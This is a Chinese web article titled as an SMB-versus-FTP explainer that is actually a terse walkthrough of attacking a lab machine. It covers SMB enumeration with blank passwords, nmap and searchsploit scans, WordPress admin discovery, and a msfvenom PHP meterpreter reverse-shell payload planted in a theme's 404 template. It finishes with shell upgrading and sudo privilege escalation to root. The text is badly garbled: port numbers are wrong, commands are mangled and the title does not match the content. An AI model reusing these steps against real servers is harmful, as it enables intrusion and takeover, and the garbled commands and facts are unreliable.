什么是SMB协议-与FTP协议有什么不同-,SMB协议端口

  什么是SMB协议?与FTP协议有什么不同?,SMB协议端口

  SMB(ServerMessage Block)通信协议是微软和英特尔在1987年制定的。主要用作微软网络的通信协议。

  端口139(TCP)-文件和打印共享;Smbd(基于SMB(服务器消息端口445 (TCP)-NetBIOS服务在windos 2000及更高版本中使用该端口,(CIFS,是SMB协议扩展到互联网后的互联网文件共享块)协议,主要用于局域网,文件共享协议)

  39和445是smb协议。

  306开发mysql服务

  1对于smb协议,请使用空白密码。

  smbclient -L ip

  smbclient \\ip\$share

  Ipc是一个空文件,打印机没有访问它的权限。

  获取敏感文件

  -gedit是Linux环境下的文本编辑器,类似于windows中的写字板程序。不需要特别复杂的编程环境,更适合作为基本的文本编辑器。

  306端口开放mysql服务

  不允许远程登录mysql。

  然后通过ssh协议登录主机。

  2分析smb协议的远程溢出漏洞

  Searchsploit samba版本号

  nmap -A -v -T4

  查找samba版本号

  根据http协议漏洞分析

  用浏览器查网站,用Dirb和Nikto检测,找到突破点,后台登录目标,上传webshell。

  迪拉姆http://192

  ==目录:http://192 . 168 . 1 . 108/WordPress/WP-admin/

  登录后台。

  制作webshell

  MSF venom-p PHP/meter preter/reverse _ tcplhost=攻击机IP port=4444-f raw/root/destktop/shell . PHP

  做一个。exe文件,然后将其发送到目标机器Windows。运行后,可以使用msfconsole连接msfvenom服务来控制kali linux上的目标机器。

  进入控制台

  输入run,然后打开网页并点击外观编辑器404模板。

  将shell.php文件中的代码复制到404,上传成功后会显示出来。

  然后通过固定路径http://射击场IP/WordPress/WP-content/themes/twenty fifth/404 . PHP访问webshell。

  然后输入的id反弹回shell。

  下一步也一样,优化终端(python-c " import pty;Pty.spawn(/滑稽外套/巴什) ")

  使用cat /etc/passwd/检查当前系统的其他用户名(注意主目录)并查找togie用户。su togie切换到togie目录,密码用之前找到的12345成功登录。

  或者切换到root权限,使用sudo -l查看苏灿执行什么操作,然后使用sudo su提升权限。

  最后在root找到proof.txt。

郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。

相关文章阅读

  • window10如何搭建ftp服务器,搭建ftp文件服务器,window搭建ftp服务器详细教程
  • window10如何搭建ftp服务器,如何部署ftp服务器
  • win10搭建FTP服务器,局域网共享,win10搭建FTP服务器,局域网共享,WIN10家庭版搭建FTP文件服务器详细教程
  • Win10搭建ftp服务器,window10如何搭建ftp服务器_1
  • win10搭建FTP服务器,window10如何搭建ftp服务器
  • Win10搭建ftp服务器,window10如何搭建ftp服务器,Win10系统搭建ftp文件服务器详细教程
  • win10搭建FTP服务器,window10如何搭建ftp服务器,win10搭建配置ftp服务器的方法
  • win10家庭版 ftp,win10搭建FTP服务器,局域网共享
  • win10家庭版 ftp,win10搭建FTP服务器,局域网共享,WIN10家庭版搭建FTP文件服务器详细教程
  • ,,架设自己的FTP服务器 Serv-U详细配置图文教程[推荐]
  • ,,命令行下的FTP使用详解
  • ,,Xftp的下载和安装教程(图文教程)
  • ,,Windows搭建FTP服务器详细教程
  • ,,Windows7下FTP搭建图文教程
  • ,,windows10本地搭建FTP服务器图文教程
  • 留言与评论(共有 条评论)
       
    验证码: